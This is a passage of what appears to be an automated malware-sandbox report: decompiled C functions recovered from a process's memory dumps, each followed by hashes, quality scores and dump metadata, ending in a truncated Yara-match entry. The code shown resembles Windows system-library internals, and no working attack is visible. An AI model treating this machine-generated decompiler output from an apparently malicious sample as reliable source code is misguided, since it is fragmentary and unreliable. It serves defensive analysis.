                                                                                                                                    							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                                                                                                                    							_t44 = _t62 - 1;
                                                                                                                                    							if(_t44 <= 7) {
                                                                                                                                    								switch( *((intOrPtr*)(_t44 * 4 +  &M04B6E810))) {
                                                                                                                                    									case 0:
                                                                                                                                    										L6:
                                                                                                                                    										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                                                                                                                    										goto L7;
                                                                                                                                    									case 1:
                                                                                                                                    										L13:
                                                                                                                                    										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                                                                                                                    										goto L6;
                                                                                                                                    									case 2:
                                                                                                                                    										L12:
                                                                                                                                    										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                                                                                                                    										goto L13;
                                                                                                                                    									case 3:
                                                                                                                                    										L11:
                                                                                                                                    										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                                                                                                                    										goto L12;
                                                                                                                                    									case 4:
                                                                                                                                    										L10:
                                                                                                                                    										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                                                                                                                    										goto L11;
                                                                                                                                    									case 5:
                                                                                                                                    										L9:
                                                                                                                                    										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                                                                                                                    										goto L10;
                                                                                                                                    									case 6:
                                                                                                                                    										L17:
                                                                                                                                    										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                                                                                                                    										goto L9;
                                                                                                                                    									case 7:
                                                                                                                                    										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                                                                                                                    										goto L17;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							L7:
                                                                                                                                    							 *_a40 = _t59;
                                                                                                                                    							_t37 = 0;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					return _t37;
                                                                                                                                    				} else {
                                                                                                                                    					_push(0x20);
                                                                                                                                    					asm("ror eax, cl");
                                                                                                                                    					return _a4 ^ _v8;
                                                                                                                                    				}
                                                                                                                                    			}


















                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ea58b66ea911a8ad6e1be56c1d5c9201e2874c3f1b62c5dd65f65c91f101a2e1
                                                                                                                                    • Instruction ID: a5c61fbbd24b843afb0536dafc87e4c3f94ba39cfe84a07bc1489a19371fd787
                                                                                                                                    • Opcode Fuzzy Hash: ea58b66ea911a8ad6e1be56c1d5c9201e2874c3f1b62c5dd65f65c91f101a2e1
                                                                                                                                    • Instruction Fuzzy Hash: 6F318C79A14249EFE704CF58D840B9AB7E8FB18314F1482A6F918CB341E635EC90CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                    			E04B6BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				intOrPtr _t22;
                                                                                                                                    				intOrPtr* _t41;
                                                                                                                                    				intOrPtr _t51;
                                                                                                                                    
                                                                                                                                    				_t51 =  *0x4c26100; // 0x15
                                                                                                                                    				_v12 = __edx;
                                                                                                                                    				_v8 = __ecx;
                                                                                                                                    				if(_t51 >= 0x800) {
                                                                                                                                    					L12:
                                                                                                                                    					return 0;
                                                                                                                                    				} else {
                                                                                                                                    					goto L1;
                                                                                                                                    				}
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_t22 = _t51;
                                                                                                                                    					asm("lock cmpxchg [ecx], edx");
                                                                                                                                    					if(_t51 == _t22) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					_t51 = _t22;
                                                                                                                                    					if(_t22 < 0x800) {
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					goto L12;
                                                                                                                                    				}
                                                                                                                                    				E04B52280(0xd, 0x17cbf1a0);
                                                                                                                                    				_t41 =  *0x4c260f8; // 0x0
                                                                                                                                    				if(_t41 != 0) {
                                                                                                                                    					 *0x4c260f8 =  *_t41;
                                                                                                                                    					 *0x4c260fc =  *0x4c260fc + 0xffff;
                                                                                                                                    				}
                                                                                                                                    				E04B4FFB0(_t41, 0x800, 0x17cbf1a0);
                                                                                                                                    				if(_t41 != 0) {
                                                                                                                                    					L6:
                                                                                                                                    					asm("movsd");
                                                                                                                                    					asm("movsd");
                                                                                                                                    					asm("movsd");
                                                                                                                                    					asm("movsd");
                                                                                                                                    					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                                                                                                                    					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                                                                                                                    					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                                                                                                                    					do {
                                                                                                                                    						asm("lock xadd [0x4c260f0], ax");
                                                                                                                                    						 *((short*)(_t41 + 0x34)) = 1;
                                                                                                                                    					} while (1 == 0);
                                                                                                                                    					goto L8;
                                                                                                                                    				} else {
                                                                                                                                    					_t41 = L04B54620(0x4c26100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                                                                                                                    					if(_t41 == 0) {
                                                                                                                                    						L11:
                                                                                                                                    						asm("lock dec dword [0x4c26100]");
                                                                                                                                    						L8:
                                                                                                                                    						return _t41;
                                                                                                                                    					}
                                                                                                                                    					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                                                                                                                    					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                                                                                                                    					if(_t41 == 0) {
                                                                                                                                    						goto L11;
                                                                                                                                    					}
                                                                                                                                    					goto L6;
                                                                                                                                    				}
                                                                                                                                    			}











                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 932596f895fe68c7b6d66fc20cab630c8163beb81c3f2dcd5f8e3a765a22eec3
                                                                                                                                    • Instruction ID: 859810ded632b949348846c72a82802b958e89eed2c3d5b4144628c05df1aabc
                                                                                                                                    • Opcode Fuzzy Hash: 932596f895fe68c7b6d66fc20cab630c8163beb81c3f2dcd5f8e3a765a22eec3
                                                                                                                                    • Instruction Fuzzy Hash: 4831013A7146659BDB11DF58C5807A673B4FB18314F1000B8ED46EF201EBB9FE05ABA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                    			E04B39100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                                                                                                    				signed int _t53;
                                                                                                                                    				signed int _t56;
                                                                                                                                    				signed int* _t60;
                                                                                                                                    				signed int _t63;
                                                                                                                                    				signed int _t66;
                                                                                                                                    				signed int _t69;
                                                                                                                                    				void* _t70;
                                                                                                                                    				intOrPtr* _t72;
                                                                                                                                    				void* _t78;
                                                                                                                                    				void* _t79;
                                                                                                                                    				signed int _t80;
                                                                                                                                    				intOrPtr _t82;
                                                                                                                                    				void* _t85;
                                                                                                                                    				void* _t88;
                                                                                                                                    				void* _t89;
                                                                                                                                    
                                                                                                                                    				_t84 = __esi;
                                                                                                                                    				_t70 = __ecx;
                                                                                                                                    				_t68 = __ebx;
                                                                                                                                    				_push(0x2c);
                                                                                                                                    				_push(0x4c0f6e8);
                                                                                                                                    				E04B8D0E8(__ebx, __edi, __esi);
                                                                                                                                    				 *((char*)(_t85 - 0x1d)) = 0;
                                                                                                                                    				_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                                                                                    				if(_t82 == 0) {
                                                                                                                                    					L4:
                                                                                                                                    					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                                                                                                                    						E04C088F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                                                                                                                    					}
                                                                                                                                    					L5:
                                                                                                                                    					return E04B8D130(_t68, _t82, _t84);
                                                                                                                                    				}
                                                                                                                                    				_t88 = _t82 -  *0x4c286c0; // 0x9307b0
                                                                                                                                    				if(_t88 == 0) {
                                                                                                                                    					goto L4;
                                                                                                                                    				}
                                                                                                                                    				_t89 = _t82 -  *0x4c286b8; // 0x0
                                                                                                                                    				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                                                                    					goto L4;
                                                                                                                                    				} else {
                                                                                                                                    					E04B52280(_t82 + 0xe0, _t82 + 0xe0);
                                                                                                                                    					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                                                                                                    					__eflags =  *((char*)(_t82 + 0xe5));
                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                    						E04C088F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                                                                                                                    						goto L12;
                                                                                                                                    					} else {
                                                                                                                                    						__eflags =  *((char*)(_t82 + 0xe4));
                                                                                                                                    						if( *((char*)(_t82 + 0xe4)) == 0) {
                                                                                                                                    							 *((char*)(_t82 + 0xe4)) = 1;
                                                                                                                                    							_push(_t82);
                                                                                                                                    							_push( *((intOrPtr*)(_t82 + 0x24)));
                                                                                                                                    							E04B7AFD0();
                                                                                                                                    						}
                                                                                                                                    						while(1) {
                                                                                                                                    							_t60 = _t82 + 8;
                                                                                                                                    							 *(_t85 - 0x2c) = _t60;
                                                                                                                                    							_t68 =  *_t60;
                                                                                                                                    							_t80 = _t60[1];
                                                                                                                                    							 *(_t85 - 0x28) = _t68;
                                                                                                                                    							 *(_t85 - 0x24) = _t80;
                                                                                                                                    							while(1) {
                                                                                                                                    								L10:
                                                                                                                                    								__eflags = _t80;
                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                    									break;
                                                                                                                                    								}
                                                                                                                                    								_t84 = _t68;
                                                                                                                                    								 *(_t85 - 0x30) = _t80;
                                                                                                                                    								 *(_t85 - 0x24) = _t80 - 1;
                                                                                                                                    								asm("lock cmpxchg8b [edi]");
                                                                                                                                    								_t68 = _t84;
                                                                                                                                    								 *(_t85 - 0x28) = _t68;
                                                                                                                                    								 *(_t85 - 0x24) = _t80;
                                                                                                                                    								__eflags = _t68 - _t84;
                                                                                                                                    								_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                                                                                    								if(_t68 != _t84) {
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    								__eflags = _t80 -  *(_t85 - 0x30);
                                                                                                                                    								if(_t80 !=  *(_t85 - 0x30)) {
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    								__eflags = _t80;
                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                    									break;
                                                                                                                                    								}
                                                                                                                                    								_t63 = 0;
                                                                                                                                    								 *(_t85 - 0x34) = 0;
                                                                                                                                    								_t84 = 0;
                                                                                                                                    								__eflags = 0;
                                                                                                                                    								while(1) {
                                                                                                                                    									 *(_t85 - 0x3c) = _t84;
                                                                                                                                    									__eflags = _t84 - 3;
                                                                                                                                    									if(_t84 >= 3) {
                                                                                                                                    										break;
                                                                                                                                    									}
                                                                                                                                    									__eflags = _t63;
                                                                                                                                    									if(_t63 != 0) {
                                                                                                                                    										L40:
                                                                                                                                    										_t84 =  *_t63;
                                                                                                                                    										__eflags = _t84;
                                                                                                                                    										if(_t84 != 0) {
                                                                                                                                    											_t84 =  *(_t84 + 4);
                                                                                                                                    											__eflags = _t84;
                                                                                                                                    											if(_t84 != 0) {
                                                                                                                                    												 *0x4c2b1e0(_t63, _t82);
                                                                                                                                    												 *_t84();
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    										do {
                                                                                                                                    											_t60 = _t82 + 8;
                                                                                                                                    											 *(_t85 - 0x2c) = _t60;
                                                                                                                                    											_t68 =  *_t60;
                                                                                                                                    											_t80 = _t60[1];
                                                                                                                                    											 *(_t85 - 0x28) = _t68;
                                                                                                                                    											 *(_t85 - 0x24) = _t80;
                                                                                                                                    											goto L10;
                                                                                                                                    										} while (_t63 == 0);
                                                                                                                                    										goto L40;
                                                                                                                                    									}
                                                                                                                                    									_t69 = 0;
                                                                                                                                    									__eflags = 0;
                                                                                                                                    									while(1) {
                                                                                                                                    										 *(_t85 - 0x38) = _t69;
                                                                                                                                    										__eflags = _t69 -  *0x4c284c0;
                                                                                                                                    										if(_t69 >=  *0x4c284c0) {
                                                                                                                                    											break;
                                                                                                                                    										}
                                                                                                                                    										__eflags = _t63;
                                                                                                                                    										if(_t63 != 0) {
                                                                                                                                    											break;
                                                                                                                                    										}
                                                                                                                                    										_t66 = E04C09063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                                                                                                                    										__eflags = _t66;
                                                                                                                                    										if(_t66 == 0) {
                                                                                                                                    											_t63 = 0;
                                                                                                                                    											__eflags = 0;
                                                                                                                                    										} else {
                                                                                                                                    											_t63 = _t66 + 0xfffffff4;
                                                                                                                                    										}
                                                                                                                                    										 *(_t85 - 0x34) = _t63;
                                                                                                                                    										_t69 = _t69 + 1;
                                                                                                                                    									}
                                                                                                                                    									_t84 = _t84 + 1;
                                                                                                                                    								}
                                                                                                                                    								__eflags = _t63;
                                                                                                                                    							}
                                                                                                                                    							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                    							 *((char*)(_t82 + 0xe5)) = 1;
                                                                                                                                    							 *((char*)(_t85 - 0x1d)) = 1;
                                                                                                                                    							L12:
                                                                                                                                    							 *(_t85 - 4) = 0xfffffffe;
                                                                                                                                    							E04B3922A(_t82);
                                                                                                                                    							_t53 = E04B57D50();
                                                                                                                                    							__eflags = _t53;
                                                                                                                                    							if(_t53 != 0) {
                                                                                                                                    								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                                    							} else {
                                                                                                                                    								_t56 = 0x7ffe0386;
                                                                                                                                    							}
                                                                                                                                    							__eflags =  *_t56;
                                                                                                                                    							if( *_t56 != 0) {
                                                                                                                                    								_t56 = E04C08B58(_t82);
                                                                                                                                    							}
                                                                                                                                    							__eflags =  *((char*)(_t85 - 0x1d));
                                                                                                                                    							if( *((char*)(_t85 - 0x1d)) != 0) {
                                                                                                                                    								__eflags = _t82 -  *0x4c286c0; // 0x9307b0
                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                    									__eflags = _t82 -  *0x4c286b8; // 0x0
                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                    										_t79 = 0x4c286bc;
                                                                                                                                    										_t72 = 0x4c286b8;
                                                                                                                                    										goto L18;
                                                                                                                                    									}
                                                                                                                                    									__eflags = _t56 | 0xffffffff;
                                                                                                                                    									asm("lock xadd [edi], eax");
                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                    										E04B39240(_t68, _t82, _t82, _t84, __eflags);
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									_t79 = 0x4c286c4;
                                                                                                                                    									_t72 = 0x4c286c0;
                                                                                                                                    									L18:
                                                                                                                                    									E04B69B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							goto L5;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}

                                                                                                                                    0x04b9375e
                                                                                                                                    0x04b93761
                                                                                                                                    0x04b93764
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b93766
                                                                                                                                    0x04b93768
                                                                                                                                    0x04b937a3
                                                                                                                                    0x04b937a3
                                                                                                                                    0x04b937a5
                                                                                                                                    0x04b937a7
                                                                                                                                    0x04b937ad
                                                                                                                                    0x04b937b0
                                                                                                                                    0x04b937b2
                                                                                                                                    0x04b937bc
                                                                                                                                    0x04b937c2
                                                                                                                                    0x04b937c2
                                                                                                                                    0x04b937b2
                                                                                                                                    0x04b39187
                                                                                                                                    0x04b39187
                                                                                                                                    0x04b3918a
                                                                                                                                    0x04b3918d
                                                                                                                                    0x04b3918f
                                                                                                                                    0x04b39192
                                                                                                                                    0x04b39195
                                                                                                                                    0x00000000
                                                                                                                                    0x04b39195
                                                                                                                                    0x00000000
                                                                                                                                    0x04b39187
                                                                                                                                    0x04b9376a
                                                                                                                                    0x04b9376a
                                                                                                                                    0x04b9376c
                                                                                                                                    0x04b9376c
                                                                                                                                    0x04b9376f
                                                                                                                                    0x04b93775
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b93777
                                                                                                                                    0x04b93779
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b93782
                                                                                                                                    0x04b93787
                                                                                                                                    0x04b93789
                                                                                                                                    0x04b93790
                                                                                                                                    0x04b93790
                                                                                                                                    0x04b9378b
                                                                                                                                    0x04b9378b
                                                                                                                                    0x04b9378b
                                                                                                                                    0x04b93792
                                                                                                                                    0x04b93795
                                                                                                                                    0x04b93795
                                                                                                                                    0x04b93798
                                                                                                                                    0x04b93798
                                                                                                                                    0x04b9379b
                                                                                                                                    0x04b9379b
                                                                                                                                    0x04b391a3
                                                                                                                                    0x04b391a9
                                                                                                                                    0x04b391b0
                                                                                                                                    0x04b391b4
                                                                                                                                    0x04b391b4
                                                                                                                                    0x04b391bb
                                                                                                                                    0x04b391c0
                                                                                                                                    0x04b391c5
                                                                                                                                    0x04b391c7
                                                                                                                                    0x04b937da
                                                                                                                                    0x04b391cd
                                                                                                                                    0x04b391cd
                                                                                                                                    0x04b391cd
                                                                                                                                    0x04b391d2
                                                                                                                                    0x04b391d5
                                                                                                                                    0x04b39239
                                                                                                                                    0x04b39239
                                                                                                                                    0x04b391d7
                                                                                                                                    0x04b391db
                                                                                                                                    0x04b391e1
                                                                                                                                    0x04b391e7
                                                                                                                                    0x04b391fd
                                                                                                                                    0x04b39203
                                                                                                                                    0x04b3921e
                                                                                                                                    0x04b39223
                                                                                                                                    0x00000000
                                                                                                                                    0x04b39223
                                                                                                                                    0x04b39205
                                                                                                                                    0x04b39208
                                                                                                                                    0x04b3920c
                                                                                                                                    0x04b39214
                                                                                                                                    0x04b39214
                                                                                                                                    0x04b391e9
                                                                                                                                    0x04b391e9
                                                                                                                                    0x04b391ee
                                                                                                                                    0x04b391f3
                                                                                                                                    0x04b391f3
                                                                                                                                    0x04b391f3
                                                                                                                                    0x04b391e7
                                                                                                                                    0x00000000
                                                                                                                                    0x04b391db
                                                                                                                                    0x04b39187
                                                                                                                                    0x04b39168

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4e8804660181c554bccf7217f06dafd8435bb5b7cfa0433ec8da31ee2c06cd8a
                                                                                                                                    • Instruction ID: 27dff06d395bc23475c9166ed2eaeedec60a45cd4f0ea13942ddfa89e217ed18
                                                                                                                                    • Opcode Fuzzy Hash: 4e8804660181c554bccf7217f06dafd8435bb5b7cfa0433ec8da31ee2c06cd8a
                                                                                                                                    • Instruction Fuzzy Hash: 3F3190B5A01A44AFEB25EF69C588BACB7F1FB48315F148299C40577281C3B5BD90CB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                    			E04B790AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                                                                                                                    				intOrPtr* _v0;
                                                                                                                                    				void* _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				char _v36;
                                                                                                                                    				void* _t38;
                                                                                                                                    				intOrPtr _t41;
                                                                                                                                    				void* _t44;
                                                                                                                                    				signed int _t45;
                                                                                                                                    				intOrPtr* _t49;
                                                                                                                                    				signed int _t57;
                                                                                                                                    				signed int _t58;
                                                                                                                                    				intOrPtr* _t59;
                                                                                                                                    				void* _t62;
                                                                                                                                    				void* _t63;
                                                                                                                                    				void* _t65;
                                                                                                                                    				void* _t66;
                                                                                                                                    				signed int _t69;
                                                                                                                                    				intOrPtr* _t70;
                                                                                                                                    				void* _t71;
                                                                                                                                    				intOrPtr* _t72;
                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                    				char _t74;
                                                                                                                                    
                                                                                                                                    				_t65 = __edx;
                                                                                                                                    				_t57 = _a4;
                                                                                                                                    				_t32 = __ecx;
                                                                                                                                    				_v8 = __edx;
                                                                                                                                    				_t3 = _t32 + 0x14c; // 0x14c
                                                                                                                                    				_t70 = _t3;
                                                                                                                                    				_v16 = __ecx;
                                                                                                                                    				_t72 =  *_t70;
                                                                                                                                    				while(_t72 != _t70) {
                                                                                                                                    					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                                                                                                                    						L24:
                                                                                                                                    						_t72 =  *_t72;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					_t30 = _t72 + 0x10; // 0x10
                                                                                                                                    					if(E04B8D4F0(_t30, _t65, _t57) == _t57) {
                                                                                                                                    						return 0xb7;
                                                                                                                                    					}
                                                                                                                                    					_t65 = _v8;
                                                                                                                                    					goto L24;
                                                                                                                                    				}
                                                                                                                                    				_t61 = _t57;
                                                                                                                                    				_push( &_v12);
                                                                                                                                    				_t66 = 0x10;
                                                                                                                                    				if(E04B6E5E0(_t57, _t66) < 0) {
                                                                                                                                    					return 0x216;
                                                                                                                                    				}
                                                                                                                                    				_t73 = L04B54620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                                                                                                                    				if(_t73 == 0) {
                                                                                                                                    					_t38 = 0xe;
                                                                                                                                    					return _t38;
                                                                                                                                    				}
                                                                                                                                    				_t9 = _t73 + 0x10; // 0x10
                                                                                                                                    				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                                                                                                                    				E04B7F3E0(_t9, _v8, _t57);
                                                                                                                                    				_t41 =  *_t70;
                                                                                                                                    				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                                                                                                                    					_t62 = 3;
                                                                                                                                    					asm("int 0x29");
                                                                                                                                    					_push(_t62);
                                                                                                                                    					_push(_t57);
                                                                                                                                    					_push(_t73);
                                                                                                                                    					_push(_t70);
                                                                                                                                    					_t71 = _t62;
                                                                                                                                    					_t74 = 0;
                                                                                                                                    					_v36 = 0;
                                                                                                                                    					_t63 = E04B6A2F0(_t62, _t71, 1, 6,  &_v36);
                                                                                                                                    					if(_t63 == 0) {
                                                                                                                                    						L20:
                                                                                                                                    						_t44 = 0x57;
                                                                                                                                    						return _t44;
                                                                                                                                    					}
                                                                                                                                    					_t45 = _v12;
                                                                                                                                    					_t58 = 0x1c;
                                                                                                                                    					if(_t45 < _t58) {
                                                                                                                                    						goto L20;
                                                                                                                                    					}
                                                                                                                                    					_t69 = _t45 / _t58;
                                                                                                                                    					if(_t69 == 0) {
                                                                                                                                    						L19:
                                                                                                                                    						return 0xe8;
                                                                                                                                    					}
                                                                                                                                    					_t59 = _v0;
                                                                                                                                    					do {
                                                                                                                                    						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                                                                                                                    							goto L18;
                                                                                                                                    						}
                                                                                                                                    						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                                                                                                                    						 *_t59 = _t49;
                                                                                                                                    						if( *_t49 != 0x53445352) {
                                                                                                                                    							goto L18;
                                                                                                                                    						}
                                                                                                                                    						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                                                                                                                    						return 0;
                                                                                                                                    						L18:
                                                                                                                                    						_t63 = _t63 + 0x1c;
                                                                                                                                    						_t74 = _t74 + 1;
                                                                                                                                    					} while (_t74 < _t69);
                                                                                                                                    					goto L19;
                                                                                                                                    				}
                                                                                                                                    				 *_t73 = _t41;
                                                                                                                                    				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                                                                                                                    				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                                                                                                                    				 *_t70 = _t73;
                                                                                                                                    				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                                                                                                                    				return 0;
                                                                                                                                    			}



























                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                                    • Instruction ID: 188ebe0a191c0e063ca1b2f10e36bae5336cba51ba4b50c247f7976be05361e2
                                                                                                                                    • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                                    • Instruction Fuzzy Hash: C32165B5A00204EFEB20DF59C444EAAF7F8EB44354F1588AAE95597650D370FD50CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                    			E04C0070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                                                                                    				char _v8;
                                                                                                                                    				intOrPtr _v11;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				intOrPtr _v15;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				intOrPtr _v28;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				char* _t32;
                                                                                                                                    				signed int* _t38;
                                                                                                                                    				signed int _t60;
                                                                                                                                    
                                                                                                                                    				_t38 = __ecx;
                                                                                                                                    				_v16 = __edx;
                                                                                                                                    				_t60 = E04C007DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                                                                                                                    				if(_t60 != 0) {
                                                                                                                                    					_t7 = _t38 + 0x38; // 0x29cd5903
                                                                                                                                    					_push( *_t7);
                                                                                                                                    					_t9 = _t38 + 0x34; // 0x6adeeb00
                                                                                                                                    					_push( *_t9);
                                                                                                                                    					_v12 = _a8 << 0xc;
                                                                                                                                    					_t11 = _t38 + 4; // 0x5de58b5b
                                                                                                                                    					_push(0x4000);
                                                                                                                                    					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                                                                                                                    					E04BFAFDE( &_v8,  &_v12);
                                                                                                                                    					E04C01293(_t38, _v28, _t60);
                                                                                                                                    					if(E04B57D50() == 0) {
                                                                                                                                    						_t32 = 0x7ffe0380;
                                                                                                                                    					} else {
                                                                                                                                    						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                                    					}
                                                                                                                                    					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                                                    						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                                                                                                                    						E04BF14FB(_t38,  *_t21, _v11, _v15, 0xd);
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				return  ~_t60;
                                                                                                                                    			}














                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                                    • Instruction ID: 643065424df2ff91e99a5f2619fdb6548e7ab024a4387ba3bf57a528b3b39faa
                                                                                                                                    • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                                    • Instruction Fuzzy Hash: E721F2362042009FD705DF1DD880B6ABBE6EBC4350F04C569F9958B381DA34E909CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
